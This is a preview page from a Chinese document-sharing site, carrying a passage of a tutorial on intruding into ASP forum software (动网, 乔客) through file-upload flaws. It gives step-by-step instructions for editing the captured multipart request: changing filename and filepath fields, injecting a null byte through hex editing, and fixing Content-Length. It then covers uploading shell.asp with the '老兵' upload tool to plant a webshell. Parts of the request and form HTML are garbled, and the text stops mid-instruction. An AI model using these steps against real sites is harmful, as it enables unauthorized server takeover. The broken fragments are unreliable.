返回
实例分析上传漏洞入侵实战及扩展

实例分析上传漏洞入侵实战及扩展

ID:23342539

大小:56.00 KB

页数:5页

时间:2018-11-07

实例分析上传漏洞入侵实战及扩展_第1页
实例分析上传漏洞入侵实战及扩展_第2页
实例分析上传漏洞入侵实战及扩展_第3页
实例分析上传漏洞入侵实战及扩展_第4页
实例分析上传漏洞入侵实战及扩展_第5页
资源描述:

《实例分析上传漏洞入侵实战及扩展》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库

1、实例分析上传漏洞入侵实战及扩展~教育资源库  【上传漏洞欺骗技术】  网络上许多程序都有着上传漏洞,比如任我飞扬整站程序、动感购物商城、秋叶商城、惠信新闻系统等。本文主要讲解上传漏洞的入侵实战以及一些扩展利用。首先我们要获得客户端和服务器之间传递的数据,事先准备好一个ASP木马准备上传,当然不可能成功,我们要的就是这中间我们向服务器提交的数据。一般用E))%>  <%Response.e=cyfddatacols=80roitvalue=sky!!>%>  <%Response.>%>  -----------------------------7d52191850242  C

2、ontent-Disposition:form-data;name=fname  E:木马aspshell.asp  -----------------------------7d52191850242  Content-Disposition:form-data;name=Submit  上传  -----------------------------7d52191850242--  传递的信息我们获取了,下面就来修改下达到欺骗目的。主要修改一下几点:  1.Content-Disposition:form-data;name=file1;123下一页友情提醒:,特别!fi

3、lename=E:木马aspshell.asp  2.Content-Disposition:form-data;name=fname  E:木马aspshell.asp  3.最重要的地方是Content-Disposition:form-data;name=filepath下面的值要修改下。我们修改成uploadFaceshell.asp后面怎么加一个空字符呢?用UltraEdit是个好方法,用16进制编辑,(因为''这个字符也占一个位置,所以我们先打入一空格,然后再在UltraEdit(用Ctrl+H转换到16进制模式下)里将就空格符的20改成00)。  

4、4.还有一个地方也要修改,就是这句Content-Length:1792表示提交数据的字符个数。  如果你修改了filepath的值那么这个长度1792也要变换,一个字母或者数字的长度就是1,不要忘记最后面那个空格那个也算1。  【上传漏洞实战】  我们就先用漏洞的鼻祖动网论坛来实战下。从原理可以看到上传的时侯还要修改数据,还要截包,所以网上出现了许多的工具。现在我们直接用老兵的上传工具来把复杂的步骤变简单,只要修改几个数据就可以。我们来看下这个工具的界面,如下图1:    图1老兵上传工具界面  我们来说下工具的用法:  Action中输入存在上传漏洞文件的URL:bbs/u

5、pfile.asp;UpPath第一个文本框填入:filepath;第二个填入:/shell.asp(你也可以写/bbs/shell.asp这样上传成功后就传到/bbs目录下了!)输入一个it按键提交!    图2上传成功提示  当点击Submit按钮后,最好用浏览器自己访问下,程序也会有误报的。我们用浏览器来访问下。    图3可以看到已经上传成功了  下一步就是写入一个功能强大的木马来操作了,不再深入。  【上传漏洞实战扩展】  并不仅仅只有动网有上传漏洞,在网络上许许多多的程序都有这个漏洞,上传漏洞的原理一样,掌握之后即可自由发挥,具体视程序代码而定。下面我们以乔客论坛为

6、例为大家扩展一下上传漏洞的应用。  首先注册一个正常用户并且登录,然后找到上传页面192.168.1.3/3/upload.asp?uppath=forumupname=uptext=jk_e=form1action=?action=upfilemethod=postencType=multipart/form-data>  <INPUTtype=hiddenvalue=forumname=up_path>  <INPUTtype=hiddenvalue=200593075710name=up_name>  <INPUTtype=hiddenvalue=jk_e=up_text

7、>  <INPUTtype=filesize=40name=file_name1>  <INPUTtype=submitvalue=点击上传name=submit>  --------------------------------------------------------------------------------  看到源代码后,就应该知道老兵上传工具里边我们该怎么填写了。  Action中输入:192.168.1.3/3/upload.asp?action=upfileUpP

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。